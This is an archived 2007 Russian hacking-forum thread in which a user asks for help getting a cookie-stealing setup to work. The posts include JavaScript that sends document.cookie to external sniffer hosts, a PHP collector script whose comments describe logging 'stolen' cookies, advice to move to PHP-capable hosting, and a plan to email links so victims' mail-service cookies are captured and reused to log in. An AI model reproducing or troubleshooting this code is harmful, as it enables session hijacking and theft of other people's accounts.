PDA

Просмотр полной версии : на счет перехвата cookies. что я не так делаю?


Miixxa
19.07.2007, 12:27
вообщем у меня вопрос на счет перехвата cookies, можете мне объяснить, что я не так делаю?
вот есть скажем к примеру:
1. лог сниффера http://hackedpro.org/tools/sniff/log.php
2. адресс сниффера http://hackedpro.org/tools/sniff/s.gif

начала с того что просто тупо в браузере ввел:
http://hackedpro.org/tools/sniff/s.gif?document.cookie

в логе посмотрел, получил инфу кроме моего cookies

далее создал файл с раширением html в котором:
<script>
img = new Image();
img.src = "http://hackedpro.org/tools/sniff/s.gif?"+document.cookie;
</script>

запустил его, эффект тот же (все кроме cookies).

Далее разместил на сайте www.miixxa.narod.ru
2 файла:
первый php-script.php в котором:
<?
$query="{$HTTP_GET_VARS['com'] }\r\n"; //эта часть скрипта принимает украденные cookies, переданные JavaScript'ом.
$file="cookies.txt"; //здесь мы определили файл, куда будет производиться запись полученных cookies.
if (is_writeable ($file)) { //проверяем можно ли производить запись в файл.
$fh=fopen ($file, "a+"); //открыли файл для записи, запись всегда будет производиться в конец файла.
fputs ($fh, "$query"); //записали cookies в файл.
fclose ($fh); } //после записи закрыли файл.
else {
echo "Error!"; //Этот скрипт не просто запишет украденные cookie, но и скажет нам если вышла какая-то ошибка.
}
?>

и второй файл cookies.txt

Создал третий файл 1.html в котором:

<script>
img = new Image();
img.src = "http://www.miixxa.narod.ru/php-script.php?com="+document.cookie;
</script>

запустил этот файл, проверил cookies.txt - ничего.

Что я не так делаю? можете помочь?

Piflit
19.07.2007, 12:38
начала с того что просто тупо в браузере ввел...

ты с полом все-таки определись))

1.php и php-script.php - разные названия одного скрипта, а они должны совпадать =)

Miixxa
19.07.2007, 12:44
отредактировал, по именам фалов все ок, просто здесь ошибься.... Жду помощи в чем моя ошибка...

n3m0
19.07.2007, 12:50
На НАРОД.Ру вроде нету поддержки Php

Y.Dmitriy
19.07.2007, 12:51
Это бред какой-то... почитай в манах как это делать(там все написано!), попробуй на себе...

Miixxa
19.07.2007, 12:55
да, живопись интереснее, там все понятнее :) может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?

Piflit
19.07.2007, 12:57
да, живопись интереснее, там все понятнее :) может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?

хостера тебе надо изменить

NOmeR1
19.07.2007, 12:59
да, живопись интереснее, там все понятнее :) может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?
поменяй хостинг, на котором лежит php-script.php, на любой с поддержкой PHP (tulpar.net, fatal.ru, holm.ru, 6te.net......)

Miixxa
19.07.2007, 13:02
т.е. запуская файл 1.html я краду кукесы с народа.ру? а если разместить данный файл также на народе а в мыле адресу вставить ссылку на него, то кукесы опять с народа будут?

Y.Dmitriy
19.07.2007, 13:03
ДА НЕТ НА НАРОДЕ ИНТЕРПРИТАТОРА ПХП ФАЙЛОВ... там только статический файлы .html, .xhtml и тд... тебе нужон хостинг с поддержкой ПХП! удачи!

Miixxa
19.07.2007, 13:05
т.е. поменяю хостера, а остальные действия верны и содержимое файлов?

Miixxa
19.07.2007, 13:06
а практика? :)

Miixxa
19.07.2007, 13:09
а document.cookie на 'document.cookie' менять не надо?

Miixxa
19.07.2007, 13:14
-10

даже елси ты поменяешь хостин
даже если ты снимешь !свои! куки

от этого не будет толка Потому что следующий вопрос будет почему приходят куки не от почты или еще от чего-нибудь)скорее всего или подобного рода

их задать можно будет? :)

Miixxa
19.07.2007, 14:16
я же патыюсь сделать что-то и спрашиваю в чем ошибка... что здесь плохого? можно просто ответить что лень объяснять и все, зачем лишние слова?

Miixxa
19.07.2007, 14:28
все тоже самое я проделал на www.siteburg.com
в файл cookies.txt не происходит записей, может все же ошибка есть в другом?

Miixxa
19.07.2007, 14:33
зачем лишние слова?
Ладно скажу по делу.
Человеку который пытается добиться результата без каких-либо необходимых усилий к получению нужной информации(открытой!) помогать желания нет.
Возникает лишь вопрос,зачем он этим занялся?
Ачат просто кишит статьями для навичков,спрашивается зачем???????если они не способны их даже прочитать,про осмыслить уже не говорю.
Надеюсь доступно объяснил.


#много опечаток,все наверно не исправил

объяснил доступно. Спасибо!

ch[@]ch
19.07.2007, 14:47
человек попросил о помощи....вы ему "помогли"....если не хотите так не надо тут писать!!!или дайте совет!и ещё на ачате статьи для новчиков старые как моя бабушка....и с помощю статьей нельзя практикаваться....

Я бы посоветовал тебе www.jino-net.ru

Miixxa
19.07.2007, 21:25
Еще раз всем привет. Сделал все как мне все советовали. Поменял хост с поддержкой пхп, цги. В файл cookies.txt изменения не вносяться, у файла с данными:
<script>
img = new Image();
img.src = "http://www.ххх.ххх.ru/php-script.php?com="+document.cookie;
</script>

должно быть расширение .html ? или .js?

далее скачал с kanick.ru/sniffer сниффер, закинул на сайт, но когда запускаю файл html с данными:

<script>
img = new Image();
img.src = "http://www.ххх.ххх.ru/s.gif?"+document.cookie;
</script>

То в логе сниффера есть IP, строка брузера, а кукесов нет (
При таком варианте: http://www.ххх.ххх.ru/s.gif?document.cookie в логе в строке QUERY вместо данных кукес надпись "document.cookie"
блин читал на форуме, в поисковиках об этом. Ничего не нашел.
Может поможете мне в последний раз? А?

Miixxa
19.07.2007, 21:40
Invlose, можем пообщаться по асе? 352973306

Miixxa
19.07.2007, 21:52
все! получилось... :) только как все и догадывались задаю еще один вопрос... с помощью чего можно применить кукисы для входа на страницу с которой я их получил?

Miixxa
19.07.2007, 22:50
эх, зря обрадовался.... не получилось... вообщем этот скрипт:
<script>
img = new Image();
img.src = "http://www.ххх.ххх.ru/s.gif?"+document.cookie;
</script>
у меня в файле index.html на хостинге
я посылаю письмо и вкладываю в него ссылку, потом открываю письмо, кликаю ссылку. проверяю лог, кукесов нет.
что не так? извините, что так часто спрашиваю, просто хочу разобраться..

Nightmarе
20.07.2007, 20:50
Лучший хостинг ИМХО jino-net.ru